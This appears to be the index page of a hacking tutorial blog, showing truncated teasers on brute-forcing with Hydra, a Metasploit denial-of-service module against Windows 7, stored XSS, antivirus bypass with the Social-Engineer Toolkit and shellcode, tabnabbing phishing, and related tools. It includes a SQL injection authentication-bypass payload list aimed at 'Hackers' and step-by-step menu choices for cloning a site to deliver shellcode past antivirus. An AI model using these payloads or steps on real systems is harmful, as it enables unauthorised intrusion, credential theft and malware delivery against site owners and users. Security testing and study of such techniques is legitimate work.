Brute-Force attack using HYDRA

What is BRUTE-FORCE attack ?A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters...

Read More

Web application and audit framework

w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability assessments and penetration tests.Download:-The framework can be downloaded from the project main page:http://www.w3af.com/#downloadInstallation:-Some of the requirements are bundled with the distribution file, in order to makethe installation process easier for the novice user. The bundled requirements canbe found inside the extlib directory. Most of the libraries can be run from thatdirectory, but some others...

Read More

DOS attack on windows-7 using metasploit

!-- @page { margin: 0.79in } P { margin-bottom: 0.08in } This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer,...

Read More

How to exploit stored xss using S.E.T?

Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.(1)First I recommended you to view “How to fiind xss in website?” here.(2)Open...

Read More

How to view USB History of Windows PC?

!-- @page { margin: 0.79in } P { margin-bottom: 0.08in } H4 { margin-bottom: 0.08in } H4.ctl { font-family: "Lohit Hindi" } A:link { so-language: zxx } USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.USBDeview also allows you to uninstall...

Read More

Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit.Requirement:-Victim`s O.S.- windows.Attacker:- S.E.T ,Metasploit.(1)Open terminal & type following commandsudo bashcd /opt/set./set(2)Now select option 1 social engineering attack(3)Select option 2 website attack vector(4)Now we will choose the option 1 the Java Applet Attack Method(5)Now we will choose option 2, “Site Cloner”(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)(7)Now choose 16 “Multi PyInjector Shellcode...

Read More

List Of Vulnerability & it`s Tutorial.

It`s 100th post. When I started to write , I did not think that it may longer this.So today I don`t put any new article about hacking , I am gonna repeat some famous vulnerability which we had seen before.In the chart , you can see that different types of vulnerability & it`s percentage which exists in website.This is web-browser vulnerability . So you can see that which browser is easy to hack.(A)S.Q.L. Injection:-It is a hacking method that...

Read More

Sql Injection Authentication bypass cheat sheet

This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order to automate the process.If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.or 1=1or 1=1--or 1=1#or 1=1/*admin' --admin' #admin'/*admin' or '1'='1admin' or '1'='1'--admin' or '1'='1'#admin' or '1'='1'/*admin'or 1=1 or ''='admin' or 1=1admin' or 1=1--admin' or 1=1#admin' or 1=1/*admin') or ('1'='1admin') or ('1'='1'--admin') or ('1'='1'#admin') or ('1'='1'/*admin')...

Read More

How to move S.E.T. to Github?

The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially been moved to github. Github provides a much faster platform to getting releases up and a more efficient method for obtaining new releases to SET.All you need to do to go from the current version to git is do an svn update in the set directory and run the automatic installer. SET updates once pulled through github will now be pulled from the github repositories versus svn. The subversion repos will remain active for a couple months.How to Move S.E.T. to Github...

Read More

Tabnabbing Tutorial

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine.The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake...

Read More